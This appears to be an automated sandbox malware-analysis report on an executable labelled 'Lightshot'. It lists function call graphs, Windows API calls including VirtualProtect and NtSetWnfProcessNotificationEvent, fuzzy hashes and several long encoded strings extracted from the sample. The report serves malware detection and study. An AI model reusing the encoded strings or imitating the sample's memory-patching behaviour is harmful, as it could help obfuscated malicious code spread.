7ff6e4d8199e 1319->1324 1322 7ff6e4d81ba0 4 API calls 1320->1322 1321 7ff6e4d81a0f 1325 7ff6e4d81b53 1322->1325 1323 7ff6e4d819e9 VirtualProtect 1323->1324 1324->1321 1324->1323 1325->1325 1220 7ff6e4d81000 1221 7ff6e4d8108b __set_app_type 1220->1221 1222 7ff6e4d81040 1220->1222 1223 7ff6e4d810b6 1221->1223 1222->1221 1224 7ff6e4d810e5 1223->1224 1226 7ff6e4d81e00 1223->1226 1227 7ff6e4d89fe0 __setusermatherr 1226->1227 1228 7ff6e4d81800 1229 7ff6e4d81812 1228->1229 1230 7ff6e4d81835 fprintf 1229->1230 1361 7ff6e4d8118b 1362 7ff6e4d811b9 _amsg_exit 1361->1362 1363 7ff6e4d81190 1361->1363 1366 7ff6e4d811fa 1362->1366 1363->1362 1364 7ff6e4d811a0 Sleep 1363->1364 1364->1362 1364->1363 1367 7ff6e4d8121a 1366->1367 1368 7ff6e4d81201 _initterm 1366->1368 1369 7ff6e4d81880 5 API calls 1367->1369 1368->1367 1370 7ff6e4d81247 SetUnhandledExceptionFilter 1369->1370 1371 7ff6e4d8126a 1370->1371 1372 7ff6e4d8126f malloc 1371->1372 1373 7ff6e4d8128b 1372->1373 1374 7ff6e4d812a0 strlen malloc memcpy 1373->1374 1374->1374 1375 7ff6e4d812d0 1374->1375 1376 7ff6e4d8132d _cexit 1375->1376 1377 7ff6e4d81338 1375->1377 1376->1377 1455 7ff6e4d81f47 1456 7ff6e4d81e67 signal 1455->1456 1459 7ff6e4d81e99 1455->1459 1457 7ff6e4d81e7c 1456->1457 1456->1459 1458 7ff6e4d81e82 signal 1457->1458 1457->1459 1458->1459 1190 7ff6e4d81394 1194 7ff6e4d89a50 1190->1194 1192 7ff6e4d813b8 1193 7ff6e4d813c6 NtSetWnfProcessNotificationEvent 1192->1193 1195 7ff6e4d89a6e 1194->1195 1197 7ff6e4d89a9b 1194->1197 1195->1192 1196 7ff6e4d89b43 1198 7ff6e4d89b5f malloc 1196->1198 1197->1195 1197->1196 1199 7ff6e4d89b80 1198->1199 1199->1195 1326 7ff6e4d81ad4 1327 7ff6e4d81a70 1326->1327 1328 7ff6e4d8199e 1327->1328 1329 7ff6e4d81b36 1327->1329 1334 7ff6e4d81b5c 1327->1334 1330 7ff6e4d81a0f 1328->1330 1333 7ff6e4d819e9 VirtualProtect 1328->1333 1331 7ff6e4d81ba0 4 API calls 1329->1331 1332 7ff6e4d81b53 1331->1332 1333->1328 1460 7ff6e4d83352 1469 7ff6e4d833b7 1460->1469 1461 7ff6e4d83579 1462 7ff6e4d8362b wcscpy wcscat wcslen 1461->1462 1463 7ff6e4d81422 2 API calls 1462->1463 1465 7ff6e4d83728 1463->1465 1464 7ff6e4d83493 wcscpy wcscat wcslen 1473 7ff6e4d81422 1464->1473 1466 7ff6e4d83767 1465->1466 1475 7ff6e4d81431 1465->1475 1469->1461 1469->1464 1471 7ff6e4d8145e 2 API calls 1469->1471 1471->1469 1474 7ff6e4d81394 2 API calls 1473->1474 1476 7ff6e4d81394 2 API calls 1475->1476 1231 7ff6e4d81e10 1232 7ff6e4d81e2f 1231->1232 1233 7ff6e4d81e55 1232->1233 1234 7ff6e4d81ecc 1232->1234 1236 7ff6e4d81eb5 1232->1236 1233->1236 1239 7ff6e4d81f12 signal 1233->1239 1235 7ff6e4d81ed3 signal 1234->1235 1234->1236 1235->1236 1237 7ff6e4d81ee4 1235->1237 1237->1236 1238 7ff6e4d81eea signal 1237->1238 1238->1236 1239->1236 1335 7ff6e4d81fd0 1336 7ff6e4d81fe4 1335->1336 1338 7ff6e4d82033 1335->1338 1337 7ff6e4d81ffd EnterCriticalSection LeaveCriticalSection 1336->1337 1336->1338 1337->1338 1477 7ff6e4d82050 1478 7ff6e4d820cf 1477->1478 1479 7ff6e4d8205e EnterCriticalSection 1477->1479 1480 7ff6e4d82079 1479->1480 1481 7ff6e4d820c2 LeaveCriticalSection 1479->1481 1480->1481 1481->1478

                                                                                Executed Functions

                                                                                Function 00007FF6E4D8118B Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 108sleepstringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000025.00000002.2130393951.00007FF6E4D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E4D80000, based on PE: true
                                                                                • Associated: 00000025.00000002.2130104315.00007FF6E4D80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2130472131.00007FF6E4D8B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2130557620.00007FF6E4D8E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2131279652.00007FF6E5042000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2131447980.00007FF6E5045000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_37_2_7ff6e4d80000_Lightshot.jbxd
                                                                                Similarity
                                                                                • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                                • String ID: Hc=v+$&
                                                                                • API String ID: 2643109117-1582277970
                                                                                • Opcode ID: f28bcbd3aced9bded85194f04272e05ae1a5f6cd8d3217fde42567944beb1297
                                                                                • Instruction ID: 45081d0c5122471218285d22546f3b2e4dd658ae4f7f322865ddc8609c62e7db
                                                                                • Opcode Fuzzy Hash: f28bcbd3aced9bded85194f04272e05ae1a5f6cd8d3217fde42567944beb1297
                                                                                • Instruction Fuzzy Hash: 1D415E3BE0964785F600AB35E59577D23A1AF4DB80F446232D94DC37A2DE2EB849830A
                                                                                Function 00007FF6E4D81394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • NtSetWnfProcessNotificationEvent.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E4D81156), ref: 00007FF6E4D813F7
                                                                                Memory Dump Source
                                                                                • Source File: 00000025.00000002.2130393951.00007FF6E4D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E4D80000, based on PE: true
                                                                                • Associated: 00000025.00000002.2130104315.00007FF6E4D80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2130472131.00007FF6E4D8B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2130557620.00007FF6E4D8E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2131279652.00007FF6E5042000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2131447980.00007FF6E5045000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_37_2_7ff6e4d80000_Lightshot.jbxd
                                                                                Similarity
                                                                                • API ID: EventNotificationProcess
                                                                                • String ID:
                                                                                • API String ID: 914374624-0
                                                                                • Opcode ID: a1de17929970613745475dfb258eac20f00eeb650f4ca252eee93986af9b64e4
                                                                                • Instruction ID: 4c35cde3e12de7d64be0b70d783a0400092825302bd3666b3b241164786cf32a
                                                                                • Opcode Fuzzy Hash: a1de17929970613745475dfb258eac20f00eeb650f4ca252eee93986af9b64e4
                                                                                • Instruction Fuzzy Hash: 99F0C97AA08B4282D610CB61F88423AB764FB4D380B116E35E98DC7B25CF3DE050CF4A

                                                                                Non-executed Functions

                                                                                Function 00007FF6E4D865EC Relevance: 27.5, APIs: 12, Strings: 6, Instructions: 489COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 42 7ff6e4d865ec-7ff6e4d865f3 43 7ff6e4d865f9-7ff6e4d866df 42->43 44 7ff6e4d866e6-7ff6e4d86784 wcslen call 7ff6e4d8153f call 7ff6e4d8145e 42->44 43->44 49 7ff6e4d8678a-7ff6e4d86791 44->49 50 7ff6e4d8680e-7ff6e4d86822 44->50 49->50 51 7ff6e4d86793-7ff6e4d86804 call 7ff6e4d82f70 call 7ff6e4d839b0 call 7ff6e4d814c7 49->51 54 7ff6e4d8686b-7ff6e4d8688d wcslen 50->54 55 7ff6e4d86824-7ff6e4d86864 50->55 51->50 68 7ff6e4d86806-7ff6e4d86809 call 7ff6e4d8145e 51->68 59 7ff6e4d86890-7ff6e4d868a0 54->59 55->54 63 7ff6e4d869ac 59->63 64 7ff6e4d868a6-7ff6e4d868ba wcslen 59->64 67 7ff6e4d869b0-7ff6e4d869c4 63->67 64->59 66 7ff6e4d868bc 64->66 66->67 71 7ff6e4d86a29-7ff6e4d86ae1 wcscpy wcscat call 7ff6e4d82f70 call 7ff6e4d83350 call 7ff6e4d814c7 67->71 72 7ff6e4d869c6-7ff6e4d86a22 67->72 68->50 81 7ff6e4d86ae7-7ff6e4d86aee 71->81 82 7ff6e4d87ec4-7ff6e4d87f06 call 7ff6e4d81370 71->82 72->71 84 7ff6e4d86b37-7ff6e4d86b47 wcslen 81->84 85 7ff6e4d86af0-7ff6e4d86b30 81->85 82->85 89 7ff6e4d87f0c 82->89 87 7ff6e4d86b89-7ff6e4d86b8b 84->87 88 7ff6e4d86b49-7ff6e4d86b55 84->88 85->84 91 7ff6e4d86b91-7ff6e4d86bbb wcscat 87->91 90 7ff6e4d86b60-7ff6e4d86b70 88->90 89->84 96 7ff6e4d86b8d 90->96 97 7ff6e4d86b72-7ff6e4d86b85 wcslen 90->97 94 7ff6e4d87f11-7ff6e4d87f53 call 7ff6e4d81370 91->94 95 7ff6e4d86bc1-7ff6e4d86bc8 91->95 98 7ff6e4d86bca-7ff6e4d86c0a 94->98 107 7ff6e4d87f59 94->107 95->98 99 7ff6e4d86c11-7ff6e4d86c40 wcscpy wcscat 95->99 96->91 97->90 101 7ff6e4d86b87 97->101 98->99 102 7ff6e4d86c46-7ff6e4d86c4d 99->102 103 7ff6e4d87f5e-7ff6e4d87f84 call 7ff6e4d89840 call 7ff6e4d81370 99->103 101->91 105 7ff6e4d86d04-7ff6e4d86d0b 102->105 106 7ff6e4d86c53-7ff6e4d86cfd 102->106 103->106 124 7ff6e4d87f8a 103->124 109 7ff6e4d86d11-7ff6e4d86d18 105->109 110 7ff6e4d87f8f-7ff6e4d87fd3 call 7ff6e4d81370 105->110 106->105 107->99 112 7ff6e4d86d1a-7ff6e4d86d6f 109->112 113 7ff6e4d86d76-7ff6e4d86d7d 109->113 110->112 120 7ff6e4d87fd9 110->120 112->113 116 7ff6e4d86d83-7ff6e4d86d8a 113->116 117 7ff6e4d87fde-7ff6e4d88018 memcpy call 7ff6e4d81370 113->117 122 7ff6e4d86eed-7ff6e4d86f8b wcslen call 7ff6e4d8153f call 7ff6e4d8145e 116->122 123 7ff6e4d86d90-7ff6e4d86dac 116->123 117->123 128 7ff6e4d8801e 117->128 120->113 133 7ff6e4d87021-7ff6e4d87049 call 7ff6e4d8145e 122->133 134 7ff6e4d86f91-7ff6e4d86f98 122->134 126 7ff6e4d86db0-7ff6e4d86e08 123->126 124->105 126->126 129 7ff6e4d86e0a-7ff6e4d86ee6 126->129 128->122 129->122 134->133 135 7ff6e4d86f9e-7ff6e4d87017 call 7ff6e4d82f70 call 7ff6e4d839b0 call 7ff6e4d814c7 134->135 135->133 144 7ff6e4d87019-7ff6e4d8701c call 7ff6e4d8145e 135->144 144->133
                                                                                APIs
                                                                                Strings
                                                                                • 6, xrefs: 00007FF6E4D86A3B
                                                                                • 0, xrefs: 00007FF6E4D86F39
                                                                                • JTYTcnV1a2NsdGl6Ym54d2J2Y2FtdGNvKHlrdGt5b2NobGtydHVrY2h0aXpibnh3YnZjYW10Y29oeWt0E3lvYwAe0Xx0wWKuScxoNq9PLB8LBUMRHxsEHQkUSxcKFwEMHEwJF1QHHg1IHQdaJiErVw8ZBwRDUGNvODxrdA//aGO/a+sVdHVrY2h0aXqSblp3aXRtYW0mY29oZ2t0a3lvYyh9a3J0ZWtjaHRpOmNueHdiZmNhbXZjb255a3RreW9jbmxr, xrefs: 00007FF6E4D86793
                                                                                • X&, xrefs: 00007FF6E4D86FAC
                                                                                • JTb7cnd1a2NsdGl6nZF4d9p2Y2FtdGNvKHlrdGt5b2NobGtydHVrY2h0aXpibnh3YnZjYW10Y29oeWt0i3lvY2Zz0Xx0wWKuScxoNq9PLB8LBUMRHxsEHQkUSxcKFwEMHEwJF1QHHg1IHQdaJiErVw8ZBwRDeW5lTHlrdGt5b2NdVgWOBS5rzBkvadUTNXjYEy1izhAvY8A+5BDbHyJvzD7xFt0ELmvMPukE1RA1eNg06xLOHS9jwD7kF9sbIm/MPvET, xrefs: 00007FF6E4D86A65
                                                                                • JTb7cnd1a2NsdGl6nZF4d9p2Y2FtdGNvKHlrdGt5b2NobGtydHVrY2h0aXpibnh3YnZjYW10Y29oeWt0Q3hvY2Zz0Xx0wWKuScxoNq9PLB8LBUMRHxsEHQkUSxcKFwEMHEwJF1QHHg1IHQdaJiErVw8ZBwRDeW5lTHlrdGt5b2NVHJArDWT+aRFl/HAbf+19UB/1ah1l9mVaEPt/w2j6aVoF+nkbZP5pBBoBcB9/7X0OGPJqB2X2ZQQX+397aPppBAL9, xrefs: 00007FF6E4D86F9E
                                                                                Memory Dump Source
                                                                                • Source File: 00000025.00000002.2130393951.00007FF6E4D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E4D80000, based on PE: true
                                                                                • Associated: 00000025.00000002.2130104315.00007FF6E4D80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2130472131.00007FF6E4D8B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2130557620.00007FF6E4D8E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2131279652.00007FF6E5042000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2131447980.00007FF6E5045000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_37_2_7ff6e4d80000_Lightshot.jbxd
                                                                                Similarity
                                                                                • API ID: wcslen
                                                                                • String ID: 0$JTYTcnV1a2NsdGl6Ym54d2J2Y2FtdGNvKHlrdGt5b2NobGtydHVrY2h0aXpibnh3YnZjYW10Y29oeWt0E3lvYwAe0Xx0wWKuScxoNq9PLB8LBUMRHxsEHQkUSxcKFwEMHEwJF1QHHg1IHQdaJiErVw8ZBwRDUGNvODxrdA//aGO/a+sVdHVrY2h0aXqSblp3aXRtYW0mY29oZ2t0a3lvYyh9a3J0ZWtjaHRpOmNueHdiZmNhbXZjb255a3RreW9jbmxr$JTb7cnd1a2NsdGl6nZF4d9p2Y2FtdGNvKHlrdGt5b2NobGtydHVrY2h0aXpibnh3YnZjYW10Y29oeWt0Q3hvY2Zz0Xx0wWKuScxoNq9PLB8LBUMRHxsEHQkUSxcKFwEMHEwJF1QHHg1IHQdaJiErVw8ZBwRDeW5lTHlrdGt5b2NVHJArDWT+aRFl/HAbf+19UB/1ah1l9mVaEPt/w2j6aVoF+nkbZP5pBBoBcB9/7X0OGPJqB2X2ZQQX+397aPppBAL9$JTb7cnd1a2NsdGl6nZF4d9p2Y2FtdGNvKHlrdGt5b2NobGtydHVrY2h0aXpibnh3YnZjYW10Y29oeWt0i3lvY2Zz0Xx0wWKuScxoNq9PLB8LBUMRHxsEHQkUSxcKFwEMHEwJF1QHHg1IHQdaJiErVw8ZBwRDeW5lTHlrdGt5b2NdVgWOBS5rzBkvadUTNXjYEy1izhAvY8A+5BDbHyJvzD7xFt0ELmvMPukE1RA1eNg06xLOHS9jwD7kF9sbIm/MPvET$X&$ 6
                                                                                • API String ID: 4088430540-3141501615
                                                                                • Opcode ID: fefaa4b7e40953cfa417f533f7704ca4e73cf3ccdfab8b8a9cf10832c6394322
                                                                                • Instruction ID: fef9c8b939ae1d4cc5838b978b1de2ecf5f1b1fa3d85ed33e07d479792997170
                                                                                • Opcode Fuzzy Hash: fefaa4b7e40953cfa417f533f7704ca4e73cf3ccdfab8b8a9cf10832c6394322
                                                                                • Instruction Fuzzy Hash: DE529427D2C6C384F7118B35E8A13F46360AFA9798F045331E98CE65A5DF2E6A45C34E
                                                                                Function 00007FF6E4D811D8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78stringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000025.00000002.2130393951.00007FF6E4D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E4D80000, based on PE: true
                                                                                • Associated: 00000025.00000002.2130104315.00007FF6E4D80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2130472131.00007FF6E4D8B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2130557620.00007FF6E4D8E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2131279652.00007FF6E5042000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2131447980.00007FF6E5045000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_37_2_7ff6e4d80000_Lightshot.jbxd
                                                                                Similarity
                                                                                • API ID: malloc$ExceptionFilterUnhandled_cexit_inittermmemcpystrlen
                                                                                • String ID: Hc=v+$&
                                                                                • API String ID: 3825114775-1582277970
                                                                                • Opcode ID: 2ec421b47950669208d24b2c07c5bdd3e08f0d0719c06cd5544466d22b6309cc
                                                                                • Instruction ID: 28ceed0625eb0e58e24b9611ad9d913bce81299efc458190f5d0e29a03ca1fdb
                                                                                • Opcode Fuzzy Hash: 2ec421b47950669208d24b2c07c5bdd3e08f0d0719c06cd5544466d22b6309cc
                                                                                • Instruction Fuzzy Hash: 7A41423BA1964384F701EB25E59577D2351AF49B80F046232D94DC37A6DF2FB849C30A
                                                                                Function 00007FF6E4D82690 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 322COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000025.00000002.2130393951.00007FF6E4D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E4D80000, based on PE: true
                                                                                • Associated: 00000025.00000002.2130104315.00007FF6E4D80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2130472131.00007FF6E4D8B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2130557620.00007FF6E4D8E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2131279652.00007FF6E5042000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2131447980.00007FF6E5045000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_37_2_7ff6e4d80000_Lightshot.jbxd
                                                                                Similarity
                                                                                • API ID: wcslen$wcscatwcscpywcsncmp
                                                                                • String ID: 0$X$`
                                                                                • API String ID: 597572034-2527496196
                                                                                • Opcode ID: 98185c13f6d2e375cf892135551cf39061725b7e67d8172754d23c2b4611d0ec
                                                                                • Instruction ID: fbc2edee553321e5e2625aa0d297a3ecd5062a5633113374bb0c440f0228a616
                                                                                • Opcode Fuzzy Hash: 98185c13f6d2e375cf892135551cf39061725b7e67d8172754d23c2b4611d0ec
                                                                                • Instruction Fuzzy Hash: D702CC23908BC681E3208B29E8543BA77A0FB98794F045335EA9C977E5DF3DD685C709
                                                                                Function 00007FF6E4D83352 Relevance: 16.7, APIs: 6, Strings: 5, Instructions: 205COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000025.00000002.2130393951.00007FF6E4D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E4D80000, based on PE: true
                                                                                • Associated: 00000025.00000002.2130104315.00007FF6E4D80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2130472131.00007FF6E4D8B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2130557620.00007FF6E4D8E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2131279652.00007FF6E5042000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2131447980.00007FF6E5045000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_37_2_7ff6e4d80000_Lightshot.jbxd
                                                                                Similarity
                                                                                • API ID: wcscatwcscpywcslen
                                                                                • String ID: $0$0$@$@
                                                                                • API String ID: 3623275624-1413854666
                                                                                • Opcode ID: b0127d468d46c267b9460b4f0b1c573224c770eb45ce2e4a03525f6280a39a82
                                                                                • Instruction ID: a5e74404eb15ffb78d1f205358bd44c7f7484d1a2174a22c0cb6a4d05b0f440d
                                                                                • Opcode Fuzzy Hash: b0127d468d46c267b9460b4f0b1c573224c770eb45ce2e4a03525f6280a39a82
                                                                                • Instruction Fuzzy Hash: 5AB1E32680C6C685F321CB24E4553BA77A0FF94744F005231EACDD66A5DF7EE64ACB0A
                                                                                Function 00007FF6E4D81BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • VirtualQuery.KERNEL32(?,?,?,?,00007FF6E4D8C8F4,00007FF6E4D8C8F4,?,?,00007FF6E4D80000,?,00007FF6E4D81991), ref: 00007FF6E4D81C63
                                                                                • VirtualProtect.KERNEL32(?,?,?,?,00007FF6E4D8C8F4,00007FF6E4D8C8F4,?,?,00007FF6E4D80000,?,00007FF6E4D81991), ref: 00007FF6E4D81CC7
                                                                                • memcpy.MSVCRT ref: 00007FF6E4D81CE0
                                                                                • GetLastError.KERNEL32(?,?,?,?,00007FF6E4D8C8F4,00007FF6E4D8C8F4,?,?,00007FF6E4D80000,?,00007FF6E4D81991), ref: 00007FF6E4D81D23
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000025.00000002.2130393951.00007FF6E4D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E4D80000, based on PE: true
                                                                                • Associated: 00000025.00000002.2130104315.00007FF6E4D80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2130472131.00007FF6E4D8B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2130557620.00007FF6E4D8E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2131279652.00007FF6E5042000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2131447980.00007FF6E5045000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_37_2_7ff6e4d80000_Lightshot.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                                • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                • API String ID: 2595394609-2123141913
                                                                                • Opcode ID: ddbdcf1874e9ea71757a48b7d804bab9f2fa45dded7038c380b0ba63e0422925
                                                                                • Instruction ID: 7d9f556c0a0f617faaf7a10b2cbbc2846e4be2b8900ee8b83261e430942f1232
                                                                                • Opcode Fuzzy Hash: ddbdcf1874e9ea71757a48b7d804bab9f2fa45dded7038c380b0ba63e0422925
                                                                                • Instruction Fuzzy Hash: 7541A27BA0868381EA109B26D484BBD2760EF99F80F145232DD0DC37A1DE3EF549C30A
                                                                                Function 00007FF6E4D82104 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000025.00000002.2130393951.00007FF6E4D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E4D80000, based on PE: true
                                                                                • Associated: 00000025.00000002.2130104315.00007FF6E4D80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2130472131.00007FF6E4D8B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2130557620.00007FF6E4D8E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2131279652.00007FF6E5042000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2131447980.00007FF6E5045000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_37_2_7ff6e4d80000_Lightshot.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
                                                                                • String ID:
                                                                                • API String ID: 926137887-0
                                                                                • Opcode ID: 613fdf5728c7ed6876bd790cebaa614c9071348df8fdca610d58b176e96f82e5
                                                                                • Instruction ID: 738dd0c6b4897373c2948e46fab0aa14dd54e57a5aec0cf96fac173ef55075f0
                                                                                • Opcode Fuzzy Hash: 613fdf5728c7ed6876bd790cebaa614c9071348df8fdca610d58b176e96f82e5
                                                                                • Instruction Fuzzy Hash: B0212E2BE0964386FA19AB61E99477423A0BF19F90F541631DD0DC76A4CF2FBC85830A
                                                                                Function 00007FF6E4D81E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 316 7ff6e4d81e10-7ff6e4d81e2d 317 7ff6e4d81e2f-7ff6e4d81e38 316->317 318 7ff6e4d81e3e-7ff6e4d81e48 316->318 317->318 319 7ff6e4d81f60-7ff6e4d81f69 317->319 320 7ff6e4d81e4a-7ff6e4d81e53 318->320 321 7ff6e4d81ea3-7ff6e4d81ea8 318->321 322 7ff6e4d81ecc-7ff6e4d81ed1 320->322 323 7ff6e4d81e55-7ff6e4d81e60 320->323 321->319 324 7ff6e4d81eae-7ff6e4d81eb3 321->324 327 7ff6e4d81f23-7ff6e4d81f2d 322->327 328 7ff6e4d81ed3-7ff6e4d81ee2 signal 322->328 323->321 325 7ff6e4d81efb-7ff6e4d81f0a call 7ff6e4d89ff0 324->325 326 7ff6e4d81eb5-7ff6e4d81eba 324->326 325->327 337 7ff6e4d81f0c-7ff6e4d81f10 325->337 326->319 331 7ff6e4d81ec0 326->331 329 7ff6e4d81f43-7ff6e4d81f45 327->329 330 7ff6e4d81f2f-7ff6e4d81f3f 327->330 328->327 332 7ff6e4d81ee4-7ff6e4d81ee8 328->332 329->319 330->329 331->327 334 7ff6e4d81eea-7ff6e4d81ef9 signal 332->334 335 7ff6e4d81f4e-7ff6e4d81f53 332->335 334->319 338 7ff6e4d81f5a 335->338 339 7ff6e4d81f55 337->339 340 7ff6e4d81f12-7ff6e4d81f21 signal 337->340 338->319 339->338 340->319
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000025.00000002.2130393951.00007FF6E4D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E4D80000, based on PE: true
                                                                                • Associated: 00000025.00000002.2130104315.00007FF6E4D80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2130472131.00007FF6E4D8B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2130557620.00007FF6E4D8E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2131279652.00007FF6E5042000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2131447980.00007FF6E5045000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_37_2_7ff6e4d80000_Lightshot.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: CCG
                                                                                • API String ID: 0-1584390748
                                                                                • Opcode ID: 8ffd1e83da114adb7a12425d872c4067a8ab9974e88a3fba3c75f53be1714557
                                                                                • Instruction ID: 687a3fad5d91776c2edbc2d6bda399077aaeaefdc0654cd73eb97be54f50f6f0
                                                                                • Opcode Fuzzy Hash: 8ffd1e83da114adb7a12425d872c4067a8ab9974e88a3fba3c75f53be1714557
                                                                                • Instruction Fuzzy Hash: 7A217F2BE0C18741FA79523495D037D11819F8C764F28A336D90EC32DADE2EB8C9824B
                                                                                Function 00007FF6E4D838E0 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000025.00000002.2130393951.00007FF6E4D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E4D80000, based on PE: true
                                                                                • Associated: 00000025.00000002.2130104315.00007FF6E4D80000.00000002.00000001.01000000.00000004.sdmpDownload File
